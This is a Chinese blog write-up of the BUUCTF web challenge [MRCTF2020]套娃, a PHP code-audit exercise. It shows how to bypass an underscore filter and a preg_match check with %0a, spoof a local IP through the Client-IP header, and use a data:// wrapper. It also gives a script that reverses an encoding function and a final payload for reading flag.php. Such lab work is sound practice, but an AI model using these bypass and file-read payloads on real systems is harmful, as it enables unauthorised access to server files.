审计练习16——[MRCTF2020]套娃

最新推荐文章于 2024-02-18 15:01:53 发布
最新推荐文章于 2024-02-18 15:01:53 发布
阅读量421 收藏
点赞数
分类专栏: CTF write up 代码审计 文章标签: php 正则表达式 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/106709639
版权

平台:buuoj.cn
打开靶机源码处php代码
在这里插入图片描述
第一个if如果传入的参数出现_和它的url编码%5f,则打印Y0u are So cutE!
绕过:用.或空格代替_
第二个if要b_u_r_t的值为23333但添加了正则匹配,用^$来界定23333的首尾,代表了“行的开头和结尾”,只匹配一行,因此%0a换行绕过
在这里插入图片描述
打开secrettw.php
在这里插入图片描述
提示本地,xff不行,用client-ip
在这里插入图片描述
下面的jsfuck代码直接控制台输出
在这里插入图片描述
那么就post一个Merak随便传个值
回显php,代码如下

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

看最后一个if,$ip===127.0.0.1刚已经用client-ip满足条件,file_get_content使用伪协议2333=data:text/plain,todat is a happy day
满足if之后就会打印出get传入file指名文件的内容。
我们的目的是读取flag.php,但file名经过了change函数处理,把flag.php处理成乱码字符
在这里插入图片描述
那么反过来,让传入的字符串经过change之后变成flag.php即可

<?php

function change($v){ 

    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return $re; 
}
$v = 'flag.php';
echo base64_encode(change($v));
//ZmpdYSZmXGI=

最终payload

?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=

传入即可
在这里插入图片描述

hui________
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 452
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 3011
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
[MRCTF2020]套娃 1
shinygod的博客
04-01 771
知识点:Client-ip,data://, $_SERVER总结 <!-- //1st $query = $_SERVER['QUERY_STRING'];//获取参数 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ //参数中不能有_和%5f die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &&
[MRCTF2020]套娃
Sk1y的博客
07-20 2199
[MRCTF2020]套娃 考查知识点:本题三重套娃,考查的知识包括绕过过滤,空格代替_,传值方式,写代码的能力等等。 文章目录[MRCTF2020]套娃第一层套娃第二层套娃第三层套娃参考链接 第一层套娃 在f12中可以发现这个线索 <?php $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){//即不能存在_,这里用%5f url
BUUCTF [MRCTF2020]套娃
4pri1
07-22 327
BUUCTF [MRCTF2020]套娃 != 与!== 和== ===对应 1,http://localhost/aaa/ (打开aaa中的index.php) 结果: $_SERVER['QUERY_STRING'] = ""; $_SERVER['REQUEST_URI']= "/aaa/"; $_SERVER['SCRIPT_NAME']= "/aaa/index.php"; $_SERVER['PHP_SELF']= "/aaa/in...
[MRCTF2020]套娃1
最新发布
不会编程的崽的博客
02-18 1189
php非法传参,data伪协议,[][(![]+[])的js代码,数据包ip的伪造
BUU-WEB-[MRCTF2020]套娃
qq_24033605的博客
05-19 155
[MRCTF2020]套娃 查看源码,发现注释里有php审计内容。 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET
[MRCTF2020]套娃 ctf web buuctf
wuyaowangchuan的博客
11-11 1104
打开之后 源代码 $query = $_SERVER['QUERY_STRING'];// if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "y.
CTF——MISC习题讲解(MRCTF2020系列)
tlovejr的博客
03-08 4177
CTF——MISC习题讲解(MRCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下MRCTF中杂项题目 一、[MRCTF2020]pyFlag 题目链接如下: 链接:https://pan.baidu.com/s/1IQWks6UXUFq5gbkpcGp9sw?pwd=t05h 提取码:t05h 首先打开题目后发现共有三张图片 老规矩,对于杂项的题目先扔到winhex或者010Editor工具进行查看 但是发现这几张图片的结尾处都是存在压缩包数据 第一张图片 第二张图
别致的俄罗斯套娃广场.ppt
03-13
【标题】:“别致的俄罗斯套娃广场”实际上是指一个以俄罗斯传统工艺品——套娃为主题的广场,这可能是一个文化景点或者公共艺术空间。这个PPT可能是关于该广场的介绍或展示,包含了其设计特色、历史背景以及与套娃...
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
嵌套容器——在Podman容器内构建并运行Buildah
01-27
去年圣诞节,笔者送给妻子一套俄罗斯套娃。它们由一个木偶组成,每个木偶打开后是另外一个更小的木偶,直到最小那个出现。这个概念让我想到了嵌套容器。我想我或许可以尝试用Podman来构建自己的嵌套容器,我可以在...
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃问题 回溯法
08-01
在“俄罗斯套娃问题”中,我们通常要考虑如何正确地将一系列大小不一的套娃放入有限的空间内,使得每个套娃都能完全装入另一个更大的套娃之中。 回溯法解决俄罗斯套娃问题的基本步骤如下: 1. **定义状态**:首先...
[HFCTF2020]BabyUpload
qq_43756333的博客
07-04 2785
平台:https://buuoj.cn 打开靶机给出源码,分析一下 <?php error_reporting(0); session_save_path("/var/babyctf/"); session_start(); require_once "/flag"; highlight_file(__FILE__); if($_SESSION['username'] ==='admin') { $filename='/var/babyctf/success.txt'; if(file
[SWPUCTF 2018]SimplePHP
qq_43756333的博客
07-05 2149
平台:buuoj.cn 打开靶机有上传和查看文件功能 观察到查看文件url 可以直接读取文件内容 将各个文件源码复制下来主要有以下文件 考点:phar文件上传 先来看class.php,有三个类 C1e4r类对象创建时$name传递给$str,对象销毁时$str->$test并输出$test class C1e4r { public $test; public $str; public function __construct($name) {
审计练习5——[0CTF 2016]piapiapia
qq_43756333的博客
05-29 2092
平台:buuctf.cn 打开靶机源码如下: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = esc
[De1CTF 2019]ShellShellShell
qq_43756333的博客
07-17 1681
平台:buuoj.cn 打开靶机是一个登录框
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值